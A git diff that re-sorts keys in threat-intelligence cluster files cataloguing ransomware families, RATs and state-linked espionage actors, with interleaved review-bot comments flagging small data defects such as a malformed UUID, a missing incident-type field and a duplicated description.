It does not encrypt.", "meta": { + "ransomnotes": [ + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dlq8W3FXoAAYR1v[1].jpg" + ], "refs": [ "https://twitter.com/leotpsc/status/1034346447112679430", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ], "synonyms": [ "Acroware Screenlocker" - ], - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dlq8W3FXoAAYR1v[1].jpg" ] }, - "uuid": "f1b76b66-b044-11e8-8ae7-cbe7e28dd584" + "uuid": "f1b76b66-b044-11e8-8ae7-cbe7e28dd584", + "value": "Acroware Cryptolocker Ransomware" }, { - "value": "Termite Ransomware", "description": "Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.", "meta": { - "refs": [ - "https://twitter.com/B_H101/status/1034379267956715520", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - ], "extensions": [ ".aaaaaa" ], "ransomnotes": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlraMbTWwAA_367[1].jpg" + ], + "refs": [ + "https://twitter.com/B_H101/status/1034379267956715520", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, - "uuid": "a8a772b4-b04d-11e8-ad94-ab9124dff412" + "uuid": "a8a772b4-b04d-11e8-ad94-ab9124dff412", + "value": "Termite Ransomware" }, { - "value": "PICO Ransomware", "description": "S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. 
This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", - "https://twitter.com/siri_urz/status/1035138577934557184" - ], - "synonyms": [ - "Pico Ransomware" - ], "extensions": [ ".PICO" ], "ransomnotes": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dl2M9kdX0AAcGbJ[1].jpg", "README.txt" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", + "https://twitter.com/siri_urz/status/1035138577934557184" + ], + "synonyms": [ + "Pico Ransomware" ] }, - "uuid": "5d0c28f6-b050-11e8-95a8-7b8e480b9bd2" + "uuid": "5d0c28f6-b050-11e8-95a8-7b8e480b9bd2", + "value": "PICO Ransomware" }, { - "value": "Sigma Ransomware", "description": "Today one of our volunteers, Aura, told me about a new new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. 
These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipients computer.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/" - ], "ransomnotes": [ "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_01.jpg", "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_02.jpg", "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/payment-portal.jpg", "ReadMe.txt" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/" ] }, - "uuid": "df025902-b29e-11e8-a2ab-739167419c52" + "uuid": "df025902-b29e-11e8-a2ab-739167419c52", + "value": "Sigma Ransomware" }, { - "value": "Crypt0saur", - "uuid": "32406292-b738-11e8-ab97-1f674b130624" + "uuid": "32406292-b738-11e8-ab97-1f674b130624", + "value": "Crypt0saur" }, { - "value": "Mongo Lock", "description": "An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/" - ], "ransomnotes": [ "Your database was encrypted by 'Mongo Lock'. 
if you want to decrypt your database, need to be pay us 0.1 BTC (Bitcoins), also don't delete 'Unique_KEY' and save it to safe place, without that we cannot help you. Send email to us: mongodb@8chan.co for decryption service." + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/" ] }, - "uuid": "2aa481fe-c254-11e8-ad1c-efee78419960" + "uuid": "2aa481fe-c254-11e8-ad1c-efee78419960", + "value": "Mongo Lock" }, { - "value": "Kraken Cryptor Ransomware", "description": "The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it. ", "meta": { "refs": [ @@ -10597,23 +10596,24 @@ "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/" ] }, - "uuid": "c49f88f6-c87d-11e8-b005-d76e8162ced5" + "uuid": "c49f88f6-c87d-11e8-b005-d76e8162ced5", + "value": "Kraken Cryptor Ransomware" }, { - "value": "SAVEfiles", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/" - ], "extensions": [ ".SAVEfiles." ], "ransomnotes": [ "!!!SAVE__FILES__INFO!!!.txt", "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/savefiles/ransom-note-red.jpg" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/" ] }, - "uuid": "76bfb132-cc70-11e8-8623-bb3f209be6c9" + "uuid": "76bfb132-cc70-11e8-8623-bb3f209be6c9", + "value": "SAVEfiles" } ], "version": 37 diff --git a/clusters/rat.json b/clusters/rat.json index b0b8fe5..6bb8ad1 100644 --- a/clusters/rat.json +++ b/clusters/rat.json 
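Review bot: The Cassetto ransom-note string carries `x§If your files is important` mid-sentence; the `x§` looks like a stray-character artefact rather than note text, given that the same `§` appears elsewhere in this changeset glued onto a UUID, and this hunk re-sorts around the string without touching it. Since `ransomnotes` text is what an analyst compares against a note found on a host, a corrupted string is worse than none. Check it against the screenshot also listed under `ransomnotes` (`DlpDe-kXsAA2lmH[1].jpg`) and, if the note reads `...reinstall your system.\nIf your files is important...`, drop the `x§`. Minor, in the same hunk: Sigma's description has `a new new malspam campaign`.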
@@ -22,18 +22,18 @@ { "description": "JadeRAT is just one example of numerous mobile surveillanceware families we've seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage. ", "meta": { - "refs": [ - "https://blog.lookout.com/mobile-threat-jaderat", - "https://www.cfr.org/interactive/cyber-operations/jaderat" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "Ethnic minorities in China" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Civil society" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://blog.lookout.com/mobile-threat-jaderat", + "https://www.cfr.org/interactive/cyber-operations/jaderat" ] }, "uuid": "1cc8963b-5ad4-4e19-8e9a-57b0ff1ef926", @@ -2926,7 +2926,6 @@ "value": "Hallaj PRO RAT" }, { - "value": "NukeSped", "description": "This threat can install other malware on your PC, including Trojan:Win32/NukeSped.B!dha and Trojan:Win32/NukeSped.C!dha. It can show you a warning message that says your files will be made publically available if you don't follow the malicious hacker's commands. \n", "meta": { "refs": [ @@ -2938,7 +2937,8 @@ "https://www.alienvault.com/forums/discussion/17301/alienvault-labs-threat-intelligence-update-for-usm-anywhere-march-25-march-31-2018" ] }, - "uuid": "5d0369ee-c718-11e8-b328-035ed1bdca07" + "uuid": "5d0369ee-c718-11e8-b328-035ed1bdca07", + "value": "NukeSped" } ], "version": 18 diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index fb81e28..e3d0569 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json 
@@ -1111,8 +1111,6 @@ "Royal APT" ] }, - "uuid": "3501fbf2-098f-47e7-be6a-6b0ff5742ce8", - "value": "Mirage", "related": [ { "dest-uuid": "9cebfaa8-a797-11e8-99e0-3ffa312b9a10", @@ -1121,7 +1119,9 @@ ], "type": "similar" } - ] + ], + "uuid": "3501fbf2-098f-47e7-be6a-6b0ff5742ce8", + "value": "Mirage" }, { "description": "PLA Navy", @@ -5073,6 +5073,17 @@ "description": "Adversaries abusing ICS (based on Dragos Inc adversary list).\nThis threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”", "meta": { "capabilities": "Watering holes, 64-bit malware, covert C2 via IPv6 DNS, ISMDOOR", + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "Iraq", + "United Kingdom", + "Pakistan", + "Israel" + ], + "cfr-target-category": [ + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "mode-of-operation": "IT compromise, information gathering and recon against industrial orgs", "refs": [ "https://dragos.com/adversaries.html", @@ -5084,18 +5095,7 @@ "OilRig", "Greenbug" ], - "victimology": "Oil and Gas, Manufacturing, Europe, MENA, North America", - "cfr-suspected-victims": [ - "Iraq", - "United Kingdom", - "Pakistan", - "Israel" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Private sector" - ] + "victimology": "Oil and Gas, Manufacturing, Europe, MENA, North America" }, "related": [ { 
@@ -5190,6 +5190,14 @@ "description": "Adversaries abusing ICS (based on Dragos Inc adversary list).\nThis threat actor compromises the networks of companies involved in electric power, specifically looking for intellectual property and information about the companies’ operations.", "meta": { "capabilities": "Encoded binaries in documents, evasion techniques", + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "United States" + ], + "cfr-target-category": [ + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "mode-of-operation": "IT compromise with hardened anti-analysis malware against industrial orgs", "refs": [ "https://dragos.com/adversaries.html", @@ -5201,15 +5209,7 @@ "Lazarus", "Hidden Cobra" ], - "victimology": "Electric Utilities, US", - "cfr-suspected-victims": [ - "United States" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Private sector" - ] + "victimology": "Electric Utilities, US" }, "related": [ { @@ -5234,6 +5234,14 @@ "description": "Adversaries abusing ICS (based on Dragos Inc adversary list).\nThis threat actor targets industrial control systems in Turkey, Europe, and North America.\n Believed to be linked to Crouching Yeti", "meta": { "capabilities": "GOODOR, DORSHEL, KARAGANY, Mimikatz", + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "Turkey" + ], + "cfr-target-category": [ + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "mode-of-operation": "Deep ICS environment information gathering, operator credentials, industrial process details", "refs": [ "https://dragos.com/adversaries.html", 
@@ -5245,15 +5253,7 @@ "Dragonfly2", "Berserker Bear" ], - "victimology": "Turkey, Europe, US", - "cfr-suspected-victims": [ - "Turkey" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Private sector" - ] + "victimology": "Turkey, Europe, US" }, "uuid": "a08ab076-33c1-4350-b021-650c34277f2d", "value": "DYMALLOY" @@ -5332,6 +5332,26 @@ { "description": "Experts assigned the codename of LuckyMouse to the group behind this hack, but they later realized the attackers were an older Chinese threat actor known under various names in the reports of other cyber-security firms, such as Emissary Panda, APT27, Threat Group 3390, Bronze Union, ZipToken, and Iron Tiger", "meta": { + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "United States", + "Japan", + "Taiwan", + "India", + "Canada", + "China", + "Thailand", + "Israel", + "Australia", + "Republic of Korea", + "Russia", + "Iran" + ], + "cfr-target-category": [ + "Government", + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "refs": [ "https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-hacked-government-data-center/", "https://www.secureworks.com/research/bronze-union", @@ -5347,26 +5367,6 @@ "Bronze Union", "ZipToken", "Iron Tiger" - ], - "cfr-suspected-victims": [ - "United States", - "Japan", - "Taiwan", - "India", - "Canada", - "China", - "Thailand", - "Israel", - "Australia", - "Republic of Korea", - "Russia", - "Iran" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Government", - "Private sector" ] }, "related": [ 
@@ -5398,24 +5398,24 @@ { "description": "The Rancor group’s attacks use two primary malware families which are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to Singapore and Cambodia.", "meta": { + "cfr-suspected-state-sponsor": "China", + "cfr-suspected-victims": [ + "Singapore", + "Cambodia" + ], + "cfr-target-category": [ + "Government", + "Civil society" + ], + "cfr-type-of-incident": "Espionage", + "country": "CN", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", "https://www.cfr.org/interactive/cyber-operations/rancor" ], "synonyms": [ "Rancor group" - ], - "cfr-suspected-victims": [ - "Singapore", - "Cambodia" - ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Government", - "Civil society" - ], - "country": "CN" + ] }, "uuid": "79c7c7e0-79d5-11e8-9b9c-1ff96be20c0b", "value": "RANCOR" @@ -5473,8 +5473,6 @@ "value": "RedAlpha" }, { - "value": "APT-C-35", - "uuid": "b9dc4e81-909f-4324-8b25-a0f359cd88e0", "description": "In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT's attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization", "meta": { "refs": [ 
@@ -5483,36 +5481,34 @@ "synonyms": [ "DoNot Team" ] - } + }, + "uuid": "b9dc4e81-909f-4324-8b25-a0f359cd88e0", + "value": "APT-C-35" }, { - "value": "TempTick", "description": "This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. Believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/temptick" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "South Korea", "Japan" ], - "cfr-suspected-state-sponsor": "China", "cfr-target-category": [ "Government", "Private sector" ], - "country": "CN" + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/temptick" + ] }, - "uuid": "3f3ff6de-a6a7-11e8-92b4-3743eb1c7762" + "uuid": "3f3ff6de-a6a7-11e8-92b4-3743eb1c7762", + "value": "TempTick" }, { - "value": "Operation Parliament", "description": "This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/operation-parliament", - "https://securelist.com/operation-parliament-who-is-doing-what/85237/" - ], + "cfr-suspected-state-sponsor": "Unknown", "cfr-suspected-victims": [ "Palestine", "United Arab Emirates", 
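Review bot: TempTick's `meta` is the only CFR-tagged block in this hunk without a `cfr-type-of-incident`: Operation Parliament in the same hunk and every other CFR-sourced entry in the diff carry `"cfr-type-of-incident": "Espionage"`, and TempTick's own description ends "for the purpose of espionage". Add `"cfr-type-of-incident": "Espionage",` between `cfr-target-category` and `country` so the sorted key order the commit establishes is preserved. If the CFR tracker genuinely omits the incident type for this actor, a short remark in the description would save the next reader from re-checking.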
@@ -5542,22 +5538,23 @@ "Oman", "Denmark" ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Civil society" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/operation-parliament", + "https://securelist.com/operation-parliament-who-is-doing-what/85237/" ] }, - "uuid": "e20e8eb8-a6b4-11e8-8a92-6ba6e7540c6d" + "uuid": "e20e8eb8-a6b4-11e8-8a92-6ba6e7540c6d", + "value": "Operation Parliament" }, { - "value": "Inception Framework", "description": "This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/inception-framework" - ], + "cfr-suspected-state-sponsor": "Unknown", "cfr-suspected-victims": [ "South Africa", "Malaysia", 
@@ -5565,22 +5562,22 @@ "Suriname", "United Kingdom" ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Private sector" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/inception-framework" ] }, - "uuid": "71ef51ca-a791-11e8-a026-07980ca910ca" + "uuid": "71ef51ca-a791-11e8-a026-07980ca910ca", + "value": "Inception Framework" }, { - "value": "Winnti Umbrella", "description": "This threat actor targets software companies and political organizations in the United States, China, Japan, and South Korea. It primarily acts to support cyber operations conducted by other threat actors affiliated with Chinese intelligence services.\nBelieved to be associated with the Axiom, APT 17, and Mirage threat actors. Believed to share the same tools and infrastructure as the threat actors that carried out Operation Aurora, the 2015 targeting of video game companies, the 2015 targeting of the Thai government, and the 2017 targeting of Chinese-language news websites", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/winnti-umbrella" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "United States", "South Korea", @@ -5588,14 +5585,15 @@ "China", "Japan" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Private sector" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/winnti-umbrella" + ] }, - "uuid": "9cebfaa8-a797-11e8-99e0-3ffa312b9a10", "related": [ { "dest-uuid": "24110866-cb22-4c85-a7d2-0413e126694b", 
@@ -5618,26 +5616,26 @@ ], "type": "similar" } - ] + ], + "uuid": "9cebfaa8-a797-11e8-99e0-3ffa312b9a10", + "value": "Winnti Umbrella" }, { - "value": "HenBox", "description": "This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/henbox" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "Uighurs" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Civil society" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/henbox" + ] }, - "uuid": "36ee04f4-a9df-11e8-b92b-d7ddfd3a8896", "related": [ { "dest-uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§", 
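Review bot: The `similar` link in HenBox's `related` block points at `"dest-uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§"`, which is not a UUID: the trailing `§` makes it 37 characters with a non-hex character, so any consumer that validates or canonicalises UUIDs will reject the reference. The commit only re-sorts the keys around it and leaves the value as is. It should read `"dest-uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86"`, and the entry that owns that `uuid` (presumably the HenBox malware entry in another cluster file) must be corrected in the same change, otherwise the cross-reference breaks from whichever side is fixed first.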
@@ -5646,53 +5644,52 @@ ], "type": "similar" } - ] + ], + "uuid": "36ee04f4-a9df-11e8-b92b-d7ddfd3a8896", + "value": "HenBox" }, { - "value": "Mustang Panda", "description": "This threat actor targets nongovernmental organizations using Mongolian-themed lures for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/mustang-panda" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "United States" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Civil society" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/mustang-panda" + ] }, - "uuid": "78bf726c-a9e6-11e8-9e43-77249a2f7339" + "uuid": "78bf726c-a9e6-11e8-9e43-77249a2f7339", + "value": "Mustang Panda" }, { - "value": "Thrip", "description": "This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/thrip", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ], + "cfr-suspected-state-sponsor": "Unknown", "cfr-suspected-victims": [ "United States" ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Private sector" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/thrip", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ] }, - "uuid": "98be4300-a9ef-11e8-9a95-bb9221083cfc" + "uuid": "98be4300-a9ef-11e8-9a95-bb9221083cfc", + "value": "Thrip" }, { - "value": " Stealth Mango and Tangelo ", "description": "This threat actor targets organizations in the satellite communications, 
telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/stealth-mango-and-tangelo" - ], + "cfr-suspected-state-sponsor": "Pakistan", "cfr-suspected-victims": [ "Pakistan", "Iraq", 
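Review bot: The Stealth Mango and Tangelo entry keeps two data defects through the re-sort: its name is padded, `" Stealth Mango and Tangelo "` (the removed `value` line here and the re-added one in the following hunk both carry the leading and trailing space), and its `description` is byte-identical to Thrip's in the same hunk ("satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia") even though its own `meta` says sponsor Pakistan, victims Pakistan/Iraq/India/United States and target categories Government and Civil society. A padded name will not match an unpadded tag or search, and the copied description contradicts the metadata beside it. Trim the value to `"Stealth Mango and Tangelo"` and replace the description with one drawn from the CFR page listed in `refs`; I have not proposed wording since nothing in the diff supports it.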
@@ -5703,28 +5700,30 @@
 "India",
 "United States"
 ],
- "cfr-suspected-state-sponsor": "Pakistan",
- "cfr-type-of-incident": "Espionage",
 "cfr-target-category": [
 "Government",
 "Civil society"
 ],
- "country": "PK"
+ "cfr-type-of-incident": "Espionage",
+ "country": "PK",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/stealth-mango-and-tangelo"
+ ]
 },
- "uuid": "f82b352e-a9f8-11e8-8be8-fbcf6eddd58c"
+ "uuid": "f82b352e-a9f8-11e8-8be8-fbcf6eddd58c",
+ "value": " Stealth Mango and Tangelo "
 },
 {
- "value": "PowerPool",
 "description": "Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.\n\nA security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler.\n\nMore specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check user's permissions, allowing write privileges on files in C:\\Windows\\Task.\n\nThe vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level.\n\nA couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement.\n\nThe group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.\n\nThe researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.",
 "meta": {
 "refs": [
"https://www.bleepingcomputer.com/news/security/windows-task-scheduler-zero-day-exploited-by-malware/" ] }, - "uuid": "abd89986-b1b0-11e8-b857-efe290264006" + "uuid": "abd89986-b1b0-11e8-b857-efe290264006", + "value": "PowerPool" }, { - "value": "Bahamut", "description": "Bahamut is a threat actor primarily operating in Middle East and Central Asia, suspected to be a private contractor to several state sponsored actors. They were observed conduct phishing as well as desktop and mobile malware campaigns.", "meta": { "refs": [ @@ -5732,10 +5731,10 @@ "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ] }, - "uuid": "dc3edacc-bb24-11e8-81fb-8c16458922a7" + "uuid": "dc3edacc-bb24-11e8-81fb-8c16458922a7", + "value": "Bahamut" }, { - "value": "Iron Group", "description": "Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.", "meta": { "refs": [ 
@@ -5745,40 +5744,35 @@
 "Iron Cyber Group"
 ]
 },
- "uuid": "6a0ea861-229a-45a6-98f5-228f69b43905"
+ "uuid": "6a0ea861-229a-45a6-98f5-228f69b43905",
+ "value": "Iron Group"
 },
 {
- "value": "Operation BugDrop",
 "description": "This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.",
 "meta": {
- "refs": [
- "https://www.cfr.org/interactive/cyber-operations/operation-bugdrop"
- ],
+ "cfr-suspected-state-sponsor": "Russian Federation",
 "cfr-suspected-victims": [
 "Ukraine",
 "Austria",
 "Russia",
 "Saudi Arabia"
 ],
- "cfr-suspected-state-sponsor": "Russian Federation",
- "cfr-type-of-incident": "Espionage",
 "cfr-target-category": [
 "Private sector"
 ],
- "country": "RU"
+ "cfr-type-of-incident": "Espionage",
+ "country": "RU",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/operation-bugdrop"
+ ]
 },
- "uuid": "75ae52b2-bca3-11e8-af90-a78f33eee6c1"
+ "uuid": "75ae52b2-bca3-11e8-af90-a78f33eee6c1",
+ "value": "Operation BugDrop"
 },
 {
- "value": "Red October",
 "description": "This threat actor targets governments, diplomatic missions, academics, and energy and aerospace organizations for the purpose of espionage. Also known as the Rocra and believed to be the same threat actor as Cloud Atlas",
 "meta": {
- "refs": [
- "https://www.cfr.org/interactive/cyber-operations/red-october"
- ],
- "synonyms": [
- "the Rocra"
- ],
+ "cfr-suspected-state-sponsor": "Russian Federation",
 "cfr-suspected-victims": [
 "Russia",
 "Belgium",
@@ -5796,15 +5790,19 @@
 "Vietnam",
 "Italy"
 ],
- "cfr-suspected-state-sponsor": "Russian Federation",
- "cfr-type-of-incident": "Espionage",
 "cfr-target-category": [
 "Government",
 "Private sector"
 ],
- "country": "RU"
+ "cfr-type-of-incident": "Espionage",
+ "country": "RU",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/red-october"
+ ],
+ "synonyms": [
+ "the Rocra"
+ ]
 },
- "uuid": "358b8982-bcaa-11e8-8a5b-4b618197c5b0",
 "related": [
 {
 "dest-uuid": "1572f618-bcb3-11e8-841b-1fd7f9cfe126",
@@ -5813,15 +5811,14 @@
 ],
 "type": "same-as"
 }
- ]
+ ],
+ "uuid": "358b8982-bcaa-11e8-8a5b-4b618197c5b0",
+ "value": "Red October"
 },
 {
- "value": "Cloud Atlas",
 "description": "This threat actor targets governments and diplomatic organizations for espionage purposes.",
 "meta": {
- "refs": [
- "https://www.cfr.org/interactive/cyber-operations/cloud-atlas"
- ],
+ "cfr-suspected-state-sponsor": "Russian Federation",
 "cfr-suspected-victims": [
 "Russia",
 "India",
@@ -5829,14 +5826,15 @@
 "Czech Republic",
 "Belarus"
 ],
- "cfr-suspected-state-sponsor": "Russian Federation",
- "cfr-type-of-incident": "Espionage",
 "cfr-target-category": [
 "Government"
 ],
- "country": "RU"
+ "cfr-type-of-incident": "Espionage",
+ "country": "RU",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/cloud-atlas"
+ ]
 },
- "uuid": "1572f618-bcb3-11e8-841b-1fd7f9cfe126",
 "related": [
 {
 "dest-uuid": "358b8982-bcaa-11e8-8a5b-4b618197c5b0",
@@ -5845,33 +5843,34 @@
 ],
 "type": "same-as"
 }
- ]
+ ],
+ "uuid": "1572f618-bcb3-11e8-841b-1fd7f9cfe126",
+ "value": "Cloud Atlas"
 },
 {
- "value": "Unnamed Actor",
 "description": "This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activist. The threat actor also targeted the Myanmar electoral commission. ",
 "meta": {
- "refs": [
- "https://www.cfr.org/interactive/cyber-operations/unnamed-actor"
- ],
+ "cfr-suspected-state-sponsor": "China",
 "cfr-suspected-victims": [
 "China",
 "Myanmar",
 "Hong Kong",
 "Taiwan"
 ],
- "cfr-suspected-state-sponsor": "China",
- "cfr-type-of-incident": "Espionage",
 "cfr-target-category": [
 "Civil society",
 "Government"
 ],
- "country": "CN"
+ "cfr-type-of-incident": "Espionage",
+ "country": "CN",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/unnamed-actor"
+ ]
 },
